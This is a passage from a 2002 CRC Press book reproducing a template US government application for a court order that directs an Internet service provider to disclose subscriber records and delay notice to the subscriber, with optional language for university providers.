Cover art courtesy of Greg Kipper.
[…] for a period of 90 days. Providing prior notice to the subscriber or
customer could seriously jeopardize the ongoing investigation, as such
a disclosure would give the subscriber an opportunity to destroy
evidence, change patterns of behavior, notify confederates, or flee or
continue his flight from prosecution. [Optional Baker Act language
to use if the ISP is a university: The United States further requests
that [Internet Service Provider]’s compliance with the delayed
notification provisions of this Order shall be deemed authorized
under 20 U.S.C. § 1232g(b)(1)(j)(ii) (the “Baker Act”). See 34 CFR
§ 99.31 (a)(9)(i) (exempting requirement of prior notice for
©2002 CRC Press LLC
disclosures made to comply with a judicial order or lawfully
issued subpoena where the disclosure is made pursuant to “any
other subpoena issued for a law enforcement purpose and the
court or other issuing agency has ordered that the existence or
the contents of the subpoena or the information furnished in
response to the subpoena not be disclosed”)].
WHEREFORE, it is respectfully requested that the Court grant the attached
Order, (1) directing [Internet Service Provider] to provide the United States
with the records and information described in Attachment 1; (2) directing that